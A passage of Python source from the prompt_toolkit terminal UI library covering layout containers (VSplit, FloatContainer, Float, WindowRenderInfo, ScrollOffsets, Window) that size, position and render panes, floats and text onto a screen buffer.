""" def __init__(self, children, window_too_small=None, get_dimensions=None, report_dimensions_callback=None): assert all(isinstance(c, Container) for c in children) assert window_too_small is None or isinstance(window_too_small, Container) assert get_dimensions is None or callable(get_dimensions) assert report_dimensions_callback is None or callable(report_dimensions_callback) self.children = children self.window_too_small = window_too_small or _window_too_small() self.get_dimensions = get_dimensions self.report_dimensions_callback = report_dimensions_callback def preferred_width(self, cli, max_available_width): if self.children: dimensions = [c.preferred_width(cli, max_available_width) for c in self.children] return max_layout_dimensions(dimensions) else: return LayoutDimension(0) def preferred_height(self, cli, width, max_available_height): dimensions = [c.preferred_height(cli, width, max_available_height) for c in self.children] return sum_layout_dimensions(dimensions) def reset(self): for c in self.children: c.reset() def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Render the prompt to a `Screen` instance. :param screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which the output has to be written. """ sizes = self._divide_heigths(cli, write_position) if self.report_dimensions_callback: self.report_dimensions_callback(cli, sizes) if sizes is None: self.window_too_small.write_to_screen( cli, screen, mouse_handlers, write_position) else: # Draw child panes. ypos = write_position.ypos xpos = write_position.xpos width = write_position.width for s, c in zip(sizes, self.children): c.write_to_screen(cli, screen, mouse_handlers, WritePosition(xpos, ypos, width, s)) ypos += s def _divide_heigths(self, cli, write_position): """ Return the heights for all rows. Or None when there is not enough space. """ if not self.children: return [] # Calculate heights. given_dimensions = self.get_dimensions(cli) if self.get_dimensions else None def get_dimension_for_child(c, index): if given_dimensions and given_dimensions[index] is not None: return given_dimensions[index] else: return c.preferred_height(cli, write_position.width, write_position.extended_height) dimensions = [get_dimension_for_child(c, index) for index, c in enumerate(self.children)] # Sum dimensions sum_dimensions = sum_layout_dimensions(dimensions) # If there is not enough space for both. # Don't do anything. if sum_dimensions.min > write_position.extended_height: return # Find optimal sizes. (Start with minimal size, increase until we cover # the whole height.) sizes = [d.min for d in dimensions] child_generator = take_using_weights( items=list(range(len(dimensions))), weights=[d.weight for d in dimensions]) i = next(child_generator) while sum(sizes) < min(write_position.extended_height, sum_dimensions.preferred): # Increase until we meet at least the 'preferred' size. if sizes[i] < dimensions[i].preferred: sizes[i] += 1 i = next(child_generator) if not any([cli.is_returning, cli.is_exiting, cli.is_aborting]): while sum(sizes) < min(write_position.height, sum_dimensions.max): # Increase until we use all the available space. (or until "max") if sizes[i] < dimensions[i].max: sizes[i] += 1 i = next(child_generator) return sizes def walk(self, cli): """ Walk through children. """ yield self for c in self.children: for i in c.walk(cli): yield i class VSplit(Container): """ Several layouts, one stacked left/right of the other. :param children: List of child :class:`.Container` objects. 
:param window_too_small: A :class:`.Container` object that is displayed if there is not enough space for all the children. By default, this is a "Window too small" message. :param get_dimensions: (`None` or a callable that takes a `CommandLineInterface` and returns a list of `LayoutDimension` instances.) By default the dimensions are taken from the children and divided by the available space. However, when `get_dimensions` is specified, this is taken instead. :param report_dimensions_callback: When rendering, this function is called with the `CommandLineInterface` and the list of used dimensions. (As a list of integers.) """ def __init__(self, children, window_too_small=None, get_dimensions=None, report_dimensions_callback=None): assert all(isinstance(c, Container) for c in children) assert window_too_small is None or isinstance(window_too_small, Container) assert get_dimensions is None or callable(get_dimensions) assert report_dimensions_callback is None or callable(report_dimensions_callback) self.children = children self.window_too_small = window_too_small or _window_too_small() self.get_dimensions = get_dimensions self.report_dimensions_callback = report_dimensions_callback def preferred_width(self, cli, max_available_width): dimensions = [c.preferred_width(cli, max_available_width) for c in self.children] return sum_layout_dimensions(dimensions) def preferred_height(self, cli, width, max_available_height): sizes = self._divide_widths(cli, width) if sizes is None: return LayoutDimension() else: dimensions = [c.preferred_height(cli, s, max_available_height) for s, c in zip(sizes, self.children)] return max_layout_dimensions(dimensions) def reset(self): for c in self.children: c.reset() def _divide_widths(self, cli, width): """ Return the widths for all columns. Or None when there is not enough space. """ if not self.children: return [] # Calculate widths. given_dimensions = self.get_dimensions(cli) if self.get_dimensions else None def get_dimension_for_child(c, index): if given_dimensions and given_dimensions[index] is not None: return given_dimensions[index] else: return c.preferred_width(cli, width) dimensions = [get_dimension_for_child(c, index) for index, c in enumerate(self.children)] # Sum dimensions sum_dimensions = sum_layout_dimensions(dimensions) # If there is not enough space for both. # Don't do anything. if sum_dimensions.min > width: return # Find optimal sizes. (Start with minimal size, increase until we cover # the whole height.) sizes = [d.min for d in dimensions] child_generator = take_using_weights( items=list(range(len(dimensions))), weights=[d.weight for d in dimensions]) i = next(child_generator) while sum(sizes) < min(width, sum_dimensions.preferred): # Increase until we meet at least the 'preferred' size. if sizes[i] < dimensions[i].preferred: sizes[i] += 1 i = next(child_generator) while sum(sizes) < min(width, sum_dimensions.max): # Increase until we use all the available space. if sizes[i] < dimensions[i].max: sizes[i] += 1 i = next(child_generator) return sizes def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Render the prompt to a `Screen` instance. :param screen: The :class:`~prompt_toolkit.layout.screen.Screen` class to which the output has to be written. """ if not self.children: return sizes = self._divide_widths(cli, write_position.width) if self.report_dimensions_callback: self.report_dimensions_callback(cli, sizes) # If there is not enough space. 
if sizes is None: self.window_too_small.write_to_screen( cli, screen, mouse_handlers, write_position) return # Calculate heights, take the largest possible, but not larger than write_position.extended_height. heights = [child.preferred_height(cli, width, write_position.extended_height).preferred for width, child in zip(sizes, self.children)] height = max(write_position.height, min(write_position.extended_height, max(heights))) # Draw child panes. ypos = write_position.ypos xpos = write_position.xpos for s, c in zip(sizes, self.children): c.write_to_screen(cli, screen, mouse_handlers, WritePosition(xpos, ypos, s, height)) xpos += s def walk(self, cli): """ Walk through children. """ yield self for c in self.children: for i in c.walk(cli): yield i class FloatContainer(Container): """ Container which can contain another container for the background, as well as a list of floating containers on top of it. Example Usage:: FloatContainer(content=Window(...), floats=[ Float(xcursor=True, ycursor=True, layout=CompletionMenu(...)) ]) """ def __init__(self, content, floats): assert isinstance(content, Container) assert all(isinstance(f, Float) for f in floats) self.content = content self.floats = floats def reset(self): self.content.reset() for f in self.floats: f.content.reset() def preferred_width(self, cli, write_position): return self.content.preferred_width(cli, write_position) def preferred_height(self, cli, width, max_available_height): """ Return the preferred height of the float container. (We don't care about the height of the floats, they should always fit into the dimensions provided by the container.) """ return self.content.preferred_height(cli, width, max_available_height) def write_to_screen(self, cli, screen, mouse_handlers, write_position): self.content.write_to_screen(cli, screen, mouse_handlers, write_position) for fl in self.floats: # When a menu_position was given, use this instead of the cursor # position. (These cursor positions are absolute, translate again # relative to the write_position.) # Note: This should be inside the for-loop, because one float could # set the cursor position to be used for the next one. cursor_position = screen.menu_position or screen.cursor_position cursor_position = Point(x=cursor_position.x - write_position.xpos, y=cursor_position.y - write_position.ypos) fl_width = fl.get_width(cli) fl_height = fl.get_height(cli) # Left & width given. if fl.left is not None and fl_width is not None: xpos = fl.left width = fl_width # Left & right given -> calculate width. elif fl.left is not None and fl.right is not None: xpos = fl.left width = write_position.width - fl.left - fl.right # Width & right given -> calculate left. elif fl_width is not None and fl.right is not None: xpos = write_position.width - fl.right - fl_width width = fl_width elif fl.xcursor: width = fl_width if width is None: width = fl.content.preferred_width(cli, write_position.width).preferred width = min(write_position.width, width) xpos = cursor_position.x if xpos + width > write_position.width: xpos = max(0, write_position.width - width) # Only width given -> center horizontally. elif fl_width: xpos = int((write_position.width - fl_width) / 2) width = fl_width # Otherwise, take preferred width from float content. else: width = fl.content.preferred_width(cli, write_position.width).preferred if fl.left is not None: xpos = fl.left elif fl.right is not None: xpos = max(0, write_position.width - width - fl.right) else: # Center horizontally. 
xpos = max(0, int((write_position.width - width) / 2)) # Trim. width = min(width, write_position.width - xpos) # Top & height given. if fl.top is not None and fl_height is not None: ypos = fl.top height = fl_height # Top & bottom given -> calculate height. elif fl.top is not None and fl.bottom is not None: ypos = fl.top height = write_position.height - fl.top - fl.bottom # Height & bottom given -> calculate top. elif fl_height is not None and fl.bottom is not None: ypos = write_position.height - fl_height - fl.bottom height = fl_height # Near cursor elif fl.ycursor: ypos = cursor_position.y + 1 height = fl_height if height is None: height = fl.content.preferred_height( cli, width, write_position.extended_height).preferred # Reduce height if not enough space. (We can use the # extended_height when the content requires it.) if height > write_position.extended_height - ypos: if write_position.extended_height - ypos + 1 >= ypos: # When the space below the cursor is more than # the space above, just reduce the height. height = write_position.extended_height - ypos else: # Otherwise, fit the float above the cursor. height = min(height, cursor_position.y) ypos = cursor_position.y - height # Only height given -> center vertically. elif fl_width: ypos = int((write_position.height - fl_height) / 2) height = fl_height # Otherwise, take preferred height from content. else: height = fl.content.preferred_height( cli, width, write_position.extended_height).preferred if fl.top is not None: ypos = fl.top elif fl.bottom is not None: ypos = max(0, write_position.height - height - fl.bottom) else: # Center vertically. ypos = max(0, int((write_position.height - height) / 2)) # Trim. height = min(height, write_position.height - ypos) # Write float. # (xpos and ypos can be negative: a float can be partially visible.) if height > 0 and width > 0: wp = WritePosition(xpos=xpos + write_position.xpos, ypos=ypos + write_position.ypos, width=width, height=height) if not fl.hide_when_covering_content or self._area_is_empty(screen, wp): fl.content.write_to_screen(cli, screen, mouse_handlers, wp) def _area_is_empty(self, screen, write_position): """ Return True when the area below the write position is still empty. (For floats that should not hide content underneath.) """ wp = write_position Transparent = Token.Transparent for y in range(wp.ypos, wp.ypos + wp.height): if y in screen.data_buffer: row = screen.data_buffer[y] for x in range(wp.xpos, wp.xpos + wp.width): c = row[x] if c.char != ' ' or c.token != Transparent: return False return True def walk(self, cli): """ Walk through children. """ yield self for i in self.content.walk(cli): yield i for f in self.floats: for i in f.content.walk(cli): yield i class Float(object): """ Float for use in a :class:`.FloatContainer`. :param content: :class:`.Container` instance. :param hide_when_covering_content: Hide the float when it covers content underneath. 
""" def __init__(self, top=None, right=None, bottom=None, left=None, width=None, height=None, get_width=None, get_height=None, xcursor=False, ycursor=False, content=None, hide_when_covering_content=False): assert isinstance(content, Container) assert width is None or get_width is None assert height is None or get_height is None self.left = left self.right = right self.top = top self.bottom = bottom self._width = width self._height = height self._get_width = get_width self._get_height = get_height self.xcursor = xcursor self.ycursor = ycursor self.content = content self.hide_when_covering_content = hide_when_covering_content def get_width(self, cli): if self._width: return self._width if self._get_width: return self._get_width(cli) def get_height(self, cli): if self._height: return self._height if self._get_height: return self._get_height(cli) def __repr__(self): return 'Float(content=%r)' % self.content class WindowRenderInfo(object): """ Render information, for the last render time of this control. It stores mapping information between the input buffers (in case of a :class:`~prompt_toolkit.layout.controls.BufferControl`) and the actual render position on the output screen. (Could be used for implementation of the Vi 'H' and 'L' key bindings as well as implementing mouse support.) :param ui_content: The original :class:`.UIContent` instance that contains the whole input, without clipping. (ui_content) :param horizontal_scroll: The horizontal scroll of the :class:`.Window` instance. :param vertical_scroll: The vertical scroll of the :class:`.Window` instance. :param window_width: The width of the window that displays the content, without the margins. :param window_height: The height of the window that displays the content. :param configured_scroll_offsets: The scroll offsets as configured for the :class:`Window` instance. :param visible_line_to_row_col: Mapping that maps the row numbers on the displayed screen (starting from zero for the first visible line) to (row, col) tuples pointing to the row and column of the :class:`.UIContent`. :param rowcol_to_yx: Mapping that maps (row, column) tuples representing coordinates of the :class:`UIContent` to (y, x) absolute coordinates at the rendered screen. """ def __init__(self, ui_content, horizontal_scroll, vertical_scroll, window_width, window_height, configured_scroll_offsets, visible_line_to_row_col, rowcol_to_yx, x_offset, y_offset, wrap_lines): assert isinstance(ui_content, UIContent) assert isinstance(horizontal_scroll, int) assert isinstance(vertical_scroll, int) assert isinstance(window_width, int) assert isinstance(window_height, int) assert isinstance(configured_scroll_offsets, ScrollOffsets) assert isinstance(visible_line_to_row_col, dict) assert isinstance(rowcol_to_yx, dict) assert isinstance(x_offset, int) assert isinstance(y_offset, int) assert isinstance(wrap_lines, bool) self.ui_content = ui_content self.vertical_scroll = vertical_scroll self.window_width = window_width # Width without margins. self.window_height = window_height self.configured_scroll_offsets = configured_scroll_offsets self.visible_line_to_row_col = visible_line_to_row_col self.wrap_lines = wrap_lines self._rowcol_to_yx = rowcol_to_yx # row/col from input to absolute y/x # screen coordinates. 
self._x_offset = x_offset self._y_offset = y_offset @property def visible_line_to_input_line(self): return dict( (visible_line, rowcol[0]) for visible_line, rowcol in self.visible_line_to_row_col.items()) @property def cursor_position(self): """ Return the cursor position coordinates, relative to the left/top corner of the rendered screen. """ cpos = self.ui_content.cursor_position y, x = self._rowcol_to_yx[cpos.y, cpos.x] return Point(x=x - self._x_offset, y=y - self._y_offset) @property def applied_scroll_offsets(self): """ Return a :class:`.ScrollOffsets` instance that indicates the actual offset. This can be less than or equal to what's configured. E.g, when the cursor is completely at the top, the top offset will be zero rather than what's configured. """ if self.displayed_lines[0] == 0: top = 0 else: # Get row where the cursor is displayed. y = self.input_line_to_visible_line[self.ui_content.cursor_position.y] top = min(y, self.configured_scroll_offsets.top) return ScrollOffsets( top=top, bottom=min(self.ui_content.line_count - self.displayed_lines[-1] - 1, self.configured_scroll_offsets.bottom), # For left/right, it probably doesn't make sense to return something. # (We would have to calculate the widths of all the lines and keep # double width characters in mind.) left=0, right=0) @property def displayed_lines(self): """ List of all the visible rows. (Line numbers of the input buffer.) The last line may not be entirely visible. """ return sorted(row for row, col in self.visible_line_to_row_col.values()) @property def input_line_to_visible_line(self): """ Return the dictionary mapping the line numbers of the input buffer to the lines of the screen. When a line spans several rows at the screen, the first row appears in the dictionary. """ result = {} for k, v in self.visible_line_to_input_line.items(): if v in result: result[v] = min(result[v], k) else: result[v] = k return result def first_visible_line(self, after_scroll_offset=False): """ Return the line number (0 based) of the input document that corresponds with the first visible line. """ if after_scroll_offset: return self.displayed_lines[self.applied_scroll_offsets.top] else: return self.displayed_lines[0] def last_visible_line(self, before_scroll_offset=False): """ Like `first_visible_line`, but for the last visible line. """ if before_scroll_offset: return self.displayed_lines[-1 - self.applied_scroll_offsets.bottom] else: return self.displayed_lines[-1] def center_visible_line(self, before_scroll_offset=False, after_scroll_offset=False): """ Like `first_visible_line`, but for the center visible line. """ return (self.first_visible_line(after_scroll_offset) + (self.last_visible_line(before_scroll_offset) - self.first_visible_line(after_scroll_offset)) // 2 ) @property def content_height(self): """ The full height of the user control. """ return self.ui_content.line_count @property def full_height_visible(self): """ True when the full height is visible (There is no vertical scroll.) """ return self.vertical_scroll == 0 and self.last_visible_line() == self.content_height @property def top_visible(self): """ True when the top of the buffer is visible. """ return self.vertical_scroll == 0 @property def bottom_visible(self): """ True when the bottom of the buffer is visible. """ return self.last_visible_line() == self.content_height - 1 @property def vertical_scroll_percentage(self): """ Vertical scroll as a percentage. (0 means: the top is visible, 100 means: the bottom is visible.) 
""" if self.bottom_visible: return 100 else: return (100 * self.vertical_scroll // self.content_height) def get_height_for_line(self, lineno): """ Return the height of the given line. (The height that it would take, if this line became visible.) """ if self.wrap_lines: return self.ui_content.get_height_for_line(lineno, self.window_width) else: return 1 class ScrollOffsets(object): """ Scroll offsets for the :class:`.Window` class. Note that left/right offsets only make sense if line wrapping is disabled. """ def __init__(self, top=0, bottom=0, left=0, right=0): assert isinstance(top, Integer) assert isinstance(bottom, Integer) assert isinstance(left, Integer) assert isinstance(right, Integer) self._top = top self._bottom = bottom self._left = left self._right = right @property def top(self): return int(self._top) @property def bottom(self): return int(self._bottom) @property def left(self): return int(self._left) @property def right(self): return int(self._right) def __repr__(self): return 'ScrollOffsets(top=%r, bottom=%r, left=%r, right=%r)' % ( self.top, self.bottom, self.left, self.right) class ColorColumn(object): def __init__(self, position, token=Token.ColorColumn): self.position = position self.token = token _in_insert_mode = ViInsertMode() | EmacsInsertMode() class Window(Container): """ Container that holds a control. :param content: :class:`~prompt_toolkit.layout.controls.UIControl` instance. :param width: :class:`~prompt_toolkit.layout.dimension.LayoutDimension` instance. :param height: :class:`~prompt_toolkit.layout.dimension.LayoutDimension` instance. :param get_width: callable which takes a `CommandLineInterface` and returns a `LayoutDimension`. :param get_height: callable which takes a `CommandLineInterface` and returns a `LayoutDimension`. :param dont_extend_width: When `True`, don't take up more width then the preferred width reported by the control. :param dont_extend_height: When `True`, don't take up more width then the preferred height reported by the control. :param left_margins: A list of :class:`~prompt_toolkit.layout.margins.Margin` instance to be displayed on the left. For instance: :class:`~prompt_toolkit.layout.margins.NumberredMargin` can be one of them in order to show line numbers. :param right_margins: Like `left_margins`, but on the other side. :param scroll_offsets: :class:`.ScrollOffsets` instance, representing the preferred amount of lines/columns to be always visible before/after the cursor. When both top and bottom are a very high number, the cursor will be centered vertically most of the time. :param allow_scroll_beyond_bottom: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, allow scrolling so far, that the top part of the content is not visible anymore, while there is still empty space available at the bottom of the window. In the Vi editor for instance, this is possible. You will see tildes while the top part of the body is hidden. :param wrap_lines: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, don't scroll horizontally, but wrap lines instead. :param get_vertical_scroll: Callable that takes this window instance as input and returns a preferred vertical scroll. (When this is `None`, the scroll is only determined by the last and current cursor position.) :param get_horizontal_scroll: Callable that takes this window instance as input and returns a preferred vertical scroll. :param always_hide_cursor: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. 
When True, never display the cursor, even when the user control specifies a cursor position. :param cursorline: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, display a cursorline. :param cursorcolumn: A `bool` or :class:`~prompt_toolkit.filters.CLIFilter` instance. When True, display a cursorcolumn. :param get_colorcolumns: A callable that takes a `CommandLineInterface` and returns a a list of :class:`.ColorColumn` instances that describe the columns to be highlighted. :param cursorline_token: The token to be used for highlighting the current line, if `cursorline` is True. :param cursorcolumn_token: The token to be used for highlighting the current line, if `cursorcolumn` is True. """ def __init__(self, content, width=None, height=None, get_width=None, get_height=None, dont_extend_width=False, dont_extend_height=False, left_margins=None, right_margins=None, scroll_offsets=None, allow_scroll_beyond_bottom=False, wrap_lines=False, get_vertical_scroll=None, get_horizontal_scroll=None, always_hide_cursor=False, cursorline=False, cursorcolumn=False, get_colorcolumns=None, cursorline_token=Token.CursorLine, cursorcolumn_token=Token.CursorColumn): assert isinstance(content, UIControl) assert width is None or isinstance(width, LayoutDimension) assert height is None or isinstance(height, LayoutDimension) assert get_width is None or callable(get_width) assert get_height is None or callable(get_height) assert width is None or get_width is None assert height is None or get_height is None assert scroll_offsets is None or isinstance(scroll_offsets, ScrollOffsets) assert left_margins is None or all(isinstance(m, Margin) for m in left_margins) assert right_margins is None or all(isinstance(m, Margin) for m in right_margins) assert get_vertical_scroll is None or callable(get_vertical_scroll) assert get_horizontal_scroll is None or callable(get_horizontal_scroll) assert get_colorcolumns is None or callable(get_colorcolumns) self.allow_scroll_beyond_bottom = to_cli_filter(allow_scroll_beyond_bottom) self.always_hide_cursor = to_cli_filter(always_hide_cursor) self.wrap_lines = to_cli_filter(wrap_lines) self.cursorline = to_cli_filter(cursorline) self.cursorcolumn = to_cli_filter(cursorcolumn) self.content = content self.dont_extend_width = dont_extend_width self.dont_extend_height = dont_extend_height self.left_margins = left_margins or [] self.right_margins = right_margins or [] self.scroll_offsets = scroll_offsets or ScrollOffsets() self.get_vertical_scroll = get_vertical_scroll self.get_horizontal_scroll = get_horizontal_scroll self._width = get_width or (lambda cli: width) self._height = get_height or (lambda cli: height) self.get_colorcolumns = get_colorcolumns or (lambda cli: []) self.cursorline_token = cursorline_token self.cursorcolumn_token = cursorcolumn_token # Cache for the screens generated by the margin. self._ui_content_cache = SimpleCache(maxsize=8) self._margin_width_cache = SimpleCache(maxsize=1) self.reset() def __repr__(self): return 'Window(content=%r)' % self.content def reset(self): self.content.reset() #: Scrolling position of the main content. self.vertical_scroll = 0 self.horizontal_scroll = 0 # Vertical scroll 2: this is the vertical offset that a line is # scrolled if a single line (the one that contains the cursor) consumes # all of the vertical space. self.vertical_scroll_2 = 0 #: Keep render information (mappings between buffer input and render #: output.) 
self.render_info = None def _get_margin_width(self, cli, margin): """ Return the width for this margin. (Calculate only once per render time.) """ # Margin.get_width, needs to have a UIContent instance. def get_ui_content(): return self._get_ui_content(cli, width=0, height=0) def get_width(): return margin.get_width(cli, get_ui_content) key = (margin, cli.render_counter) return self._margin_width_cache.get(key, get_width) def preferred_width(self, cli, max_available_width): # Calculate the width of the margin. total_margin_width = sum(self._get_margin_width(cli, m) for m in self.left_margins + self.right_margins) # Window of the content. (Can be `None`.) preferred_width = self.content.preferred_width( cli, max_available_width - total_margin_width) if preferred_width is not None: # Include width of the margins. preferred_width += total_margin_width # Merge. return self._merge_dimensions( dimension=self._width(cli), preferred=preferred_width, dont_extend=self.dont_extend_width) def preferred_height(self, cli, width, max_available_height): total_margin_width = sum(self._get_margin_width(cli, m) for m in self.left_margins + self.right_margins) wrap_lines = self.wrap_lines(cli) return self._merge_dimensions( dimension=self._height(cli), preferred=self.content.preferred_height( cli, width - total_margin_width, max_available_height, wrap_lines), dont_extend=self.dont_extend_height) @staticmethod def _merge_dimensions(dimension, preferred=None, dont_extend=False): """ Take the LayoutDimension from this `Window` class and the received preferred size from the `UIControl` and return a `LayoutDimension` to report to the parent container. """ dimension = dimension or LayoutDimension() # When a preferred dimension was explicitly given to the Window, # ignore the UIControl. if dimension.preferred_specified: preferred = dimension.preferred # When a 'preferred' dimension is given by the UIControl, make sure # that it stays within the bounds of the Window. if preferred is not None: if dimension.max: preferred = min(preferred, dimension.max) if dimension.min: preferred = max(preferred, dimension.min) # When a `dont_extend` flag has been given, use the preferred dimension # also as the max dimension. if dont_extend and preferred is not None: max_ = min(dimension.max, preferred) else: max_ = dimension.max return LayoutDimension( min=dimension.min, max=max_, preferred=preferred, weight=dimension.weight) def _get_ui_content(self, cli, width, height): """ Create a `UIContent` instance. """ def get_content(): return self.content.create_content(cli, width=width, height=height) key = (cli.render_counter, width, height) return self._ui_content_cache.get(key, get_content) def _get_digraph_char(self, cli): " Return `False`, or the Digraph symbol to be used. " if cli.vi_state.waiting_for_digraph: if cli.vi_state.digraph_symbol1: return cli.vi_state.digraph_symbol1 return '?' return False def write_to_screen(self, cli, screen, mouse_handlers, write_position): """ Write window to screen. This renders the user control, the margins and copies everything over to the absolute position at the given screen. """ # Calculate margin sizes. left_margin_widths = [self._get_margin_width(cli, m) for m in self.left_margins] right_margin_widths = [self._get_margin_width(cli, m) for m in self.right_margins] total_margin_width = sum(left_margin_widths + right_margin_widths) # Render UserControl. 
ui_content = self.content.create_content( cli, write_position.width - total_margin_width, write_position.height) assert isinstance(ui_content, UIContent) # Scroll content. wrap_lines = self.wrap_lines(cli) scroll_func = self._scroll_when_linewrapping if wrap_lines else self._scroll_without_linewrapping scroll_func( ui_content, write_position.width - total_margin_width, write_position.height, cli) # Write body visible_line_to_row_col, rowcol_to_yx = self._copy_body( cli, ui_content, screen, write_position, sum(left_margin_widths), write_position.width - total_margin_width, self.vertical_scroll, self.horizontal_scroll, has_focus=self.content.has_focus(cli), wrap_lines=wrap_lines, highlight_lines=True, vertical_scroll_2=self.vertical_scroll_2, always_hide_cursor=self.always_hide_cursor(cli)) # Remember render info. (Set before generating the margins. They need this.) x_offset=write_position.xpos + sum(left_margin_widths) y_offset=write_position.ypos self.render_info = WindowRenderInfo( ui_content=ui_content, horizontal_scroll=self.horizontal_scroll, vertical_scroll=self.vertical_scroll, window_width=write_position.width - total_margin_width, window_height=write_position.height, configured_scroll_offsets=self.scroll_offsets, visible_line_to_row_col=visible_line_to_row_col, rowcol_to_yx=rowcol_to_yx, x_offset=x_offset, y_offset=y_offset, wrap_lines=wrap_lines) # Set mouse handlers. def mouse_handler(cli, mouse_event): """ Wrapper around the mouse_handler of the `UIControl` that turns screen coordinates into line coordinates. """ # Find row/col position first. yx_to_rowcol = dict((v, k) for k, v in rowcol_to_yx.items()) y = mouse_event.position.y x = mouse_event.position.x # If clicked below the content area, look for a position in the # last line instead. max_y = write_position.ypos + len(visible_line_to_row_col) - 1 y = min(max_y, y) while x >= 0: try: row, col = yx_to_rowcol[y, x] except KeyError: # Try again. (When clicking on the right side of double # width characters, or on the right side of the input.) x -= 1 else: # Found position, call handler of UIControl. result = self.content.mouse_handler( cli, MouseEvent(position=Point(x=col, y=row), event_type=mouse_event.event_type)) break else: # nobreak. # (No x/y coordinate found for the content. This happens in # case of a FillControl, that only specifies a background, but # doesn't have a content. Report (0,0) instead.) result = self.content.mouse_handler( cli, MouseEvent(position=Point(x=0, y=0), event_type=mouse_event.event_type)) # If it returns NotImplemented, handle it here. if result == NotImplemented: return self._mouse_handler(cli, mouse_event) return result mouse_handlers.set_mouse_handler_for_range( x_min=write_position.xpos + sum(left_margin_widths), x_max=write_position.xpos + write_position.width - total_margin_width, y_min=write_position.ypos, y_max=write_position.ypos + write_position.height, handler=mouse_handler) # Render and copy margins. move_x = 0 def render_margin(m, width): " Render margin. Return `Screen`. " # Retrieve margin tokens. tokens = m.create_margin(cli, self.render_info, width, write_position.height) # Turn it into a UIContent object. # already rendered those tokens using this size.) return TokenListControl.static(tokens).create_content( cli, width + 1, write_position.height) for m, width in zip(self.left_margins, left_margin_widths): # Create screen for margin. margin_screen = render_margin(m, width) # Copy and shift X. 
self._copy_margin(cli, margin_screen, screen, write_position, move_x, width) move_x += width move_x = write_position.width - sum(right_margin_widths) for m, width in zip(self.right_margins, right_margin_widths): # Create screen for margin. margin_screen = render_margin(m, width) # Copy and shift X. self._copy_margin(cli, margin_screen, screen, write_position, move_x, width) move_x += width def _copy_body(self, cli, ui_content, new_screen, write_position, move_x, width, vertical_scroll=0, horizontal_scroll=0, has_focus=False, wrap_lines=False, highlight_lines=False, vertical_scroll_2=0, always_hide_cursor=False): """ Copy the UIContent into the output screen. """ xpos = write_position.xpos + move_x ypos = write_position.ypos line_count = ui_content.line_count new_buffer = new_screen.data_buffer empty_char = _CHAR_CACHE['', Token] ZeroWidthEscape = Token.ZeroWidthEscape # Map visible line number to (row, col) of input. # 'col' will always be zero if line wrapping is off. visible_line_to_row_col = {} rowcol_to_yx = {} # Maps (row, col) from the input to (y, x) screen coordinates. # Fill background with default_char first. default_char = ui_content.default_char if default_char: for y in range(ypos, ypos + write_position.height): new_buffer_row = new_buffer[y] for x in range(xpos, xpos + width): new_buffer_row[x] = default_char # Copy content. def copy(): y = - vertical_scroll_2 lineno = vertical_scroll while y < write_position.height and lineno < line_count: # Take the next line and copy it in the real screen. line = ui_content.get_line(lineno) col = 0 x = -horizontal_scroll visible_line_to_row_col[y] = (lineno, horizontal_scroll) new_buffer_row = new_buffer[y + ypos] for token, text in line: # Remember raw VT escape sequences. (E.g. FinalTerm's # escape sequences.) if token == ZeroWidthEscape: new_screen.zero_width_escapes[y + ypos][x + xpos] += text continue for c in text: char = _CHAR_CACHE[c, token] char_width = char.width # Wrap when the line width is exceeded. if wrap_lines and x + char_width > width: visible_line_to_row_col[y + 1] = ( lineno, visible_line_to_row_col[y][1] + x) y += 1 x = -horizontal_scroll # This would be equal to zero. # (horizontal_scroll=0 when wrap_lines.) new_buffer_row = new_buffer[y + ypos] if y >= write_position.height: return y # Break out of all for loops. # Set character in screen and shift 'x'. if x >= 0 and y >= 0 and x < write_position.width: new_buffer_row[x + xpos] = char # When we print a multi width character, make sure # to erase the neighbous positions in the screen. # (The empty string if different from everything, # so next redraw this cell will repaint anyway.) if char_width > 1: for i in range(1, char_width): new_buffer_row[x + xpos + i] = empty_char # If this is a zero width characters, then it's # probably part of a decomposed unicode character. # See: https://en.wikipedia.org/wiki/Unicode_equivalence # Merge it in the previous cell. elif char_width == 0 and x - 1 >= 0: prev_char = new_buffer_row[x + xpos - 1] char2 = _CHAR_CACHE[prev_char.char + c, prev_char.token] new_buffer_row[x + xpos - 1] = char2 # Keep track of write position for each character. rowcol_to_yx[lineno, col] = (y + ypos, x + xpos) col += 1 x += char_width lineno += 1 y += 1 return y y = copy() def cursor_pos_to_screen_pos(row, col): " Translate row/col from UIContent to real Screen coordinates. " try: y, x = rowcol_to_yx[row, col] except KeyError: # Normally this should never happen. (It is a bug, if it happens.) 
# But to be sure, return (0, 0) return Point(y=0, x=0) # raise ValueError( # 'Invalid position. row=%r col=%r, vertical_scroll=%r, ' # 'horizontal_scroll=%r, height=%r' % # (row, col, vertical_scroll, horizontal_scroll, write_position.height)) else: return Point(y=y, x=x) # Set cursor and menu positions. if ui_content.cursor_position: screen_cursor_position = cursor_pos_to_screen_pos( ui_content.cursor_position.y, ui_content.cursor_position.x) if has_focus: new_screen.cursor_position = screen_cursor_position if always_hide_cursor: new_screen.show_cursor = False else: new_screen.show_cursor = ui_content.show_cursor self._highlight_digraph(cli, new_screen) if highlight_lines: self._highlight_cursorlines( cli, new_screen, screen_cursor_position, xpos, ypos, width, write_position.height) # Draw input characters from the input processor queue. if has_focus and ui_content.cursor_position: self._show_input_processor_key_buffer(cli, new_screen) # Set menu position. if not new_screen.menu_position and ui_content.menu_position: new_screen.menu_position = cursor_pos_to_screen_pos( ui_content.menu_position.y, ui_content.menu_position.x) # Update output screne height. new_screen.height = max(new_screen.height, ypos + write_position.height) return visible_line_to_row_col, rowcol_to_yx def _highlight_digraph(self, cli, new_screen): """ When we are in Vi digraph mode, put a question mark underneath the cursor. """ digraph_char = self._get_digraph_char(cli) if digraph_char: cpos = new_screen.cursor_position new_screen.data_buffer[cpos.y][cpos.x] = \ _CHAR_CACHE[digraph_char, Token.Digraph] def _show_input_processor_key_buffer(self, cli, new_screen): """ When the user is typing a key binding that consists of several keys, display the last pressed key if the user is in insert mode and the key is meaningful to be displayed. E.g. Some people want to bind 'jj' to escape in Vi insert mode. But the first 'j' needs to be displayed in order to get some feedback. """ key_buffer = cli.input_processor.key_buffer if key_buffer and _in_insert_mode(cli) and not cli.is_done: # The textual data for the given key. (Can be a VT100 escape # sequence.) data = key_buffer[-1].data # Display only if this is a 1 cell width character. if get_cwidth(data) == 1: cpos = new_screen.cursor_position 